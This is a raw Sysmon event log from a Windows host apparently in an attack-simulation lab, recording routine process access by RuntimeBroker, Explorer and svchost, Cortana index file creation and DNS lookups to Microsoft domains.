13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bc4b|C:\Windows\System32\Windows.Storage.dll+12db23|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12bbe8|C:\Windows\System32\Windows.Storage.dll+12db04|C:\Windows\System32\Windows.Storage.dll+12bb5c|C:\Windows\System32\Windows.Storage.dll+12f2d1|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12cd6b|C:\Windows\System32\Windows.Storage.dll+12c245|C:\Windows\System32\Windows.Storage.dll+12c022|C:\Windows\System32\Windows.Storage.dll+12f28a|C:\Windows\System32\Windows.Storage.dll+12e5ac|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60e40|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+5fb52|C:\Windows\System32\Windows.Storage.dll+60148|C:\Windows\System32\Windows.Storage.dll+19f723|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000012503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45406112C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+19f828|C:\Windows\System32\Windows.Storage.dll+19f709|C:\Windows\System32\Windows.Storage.dll+60e25|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000012502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.133{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x800000000000000012501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.117{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{dcd82308-7c7c-448b-9acd-bef049aea78c}\0.2.filtertrie.intermediate.txt2021-01-18 13:58:36.117 11241100x800000000000000012500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.117{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{dcd82308-7c7c-448b-9acd-bef049aea78c}\0.1.filtertrie.intermediate.txt2021-01-18 13:58:36.117 11241100x800000000000000012499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.117{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{dcd82308-7c7c-448b-9acd-bef049aea78c}\0.0.filtertrie.intermediate.txt2021-01-18 13:58:36.117 11241100x800000000000000012498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.086{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appssynonyms.txt2016-04-15 08:09:24.000 10341000x800000000000000012497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.023{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000012496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.023{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000012495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\settingssynonyms.txt2021-01-18 13:58:36.023 11241100x800000000000000012494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appssynonyms.txt2021-01-18 13:58:36.023 11241100x800000000000000012493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\settingsconversions.txt2021-01-18 13:58:36.023 11241100x800000000000000012492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.023{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appsconversions.txt2021-01-18 13:58:36.023 11241100x800000000000000012491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.008{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\settingsglobals.txt2021-01-18 13:58:36.008 11241100x800000000000000012490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.008{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{a53efd33-e9b5-4f22-bc95-35387fae0220}\appsglobals.txt2021-01-18 13:58:36.008 22542200x800000000000000012489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.283{59A5CD1D-8E46-6005-1600-00000000A301}1544dmd.metaservices.microsoft.com0type: 5 devicemetadataservice.trafficmanager.net;type: 5 vmss-prod-eas.eastasia.cloudapp.azure.com;::ffff:20.189.118.208;C:\Windows\System32\svchost.exe 
22542200x800000000000000012488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.252{59A5CD1D-8E46-6005-1600-00000000A301}1544go.microsoft.com0type: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:104.125.79.182;C:\Windows\System32\svchost.exe 22542200x800000000000000012487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.058{59A5CD1D-8E56-6005-2E00-00000000A301}2464149.224.70.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000013188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
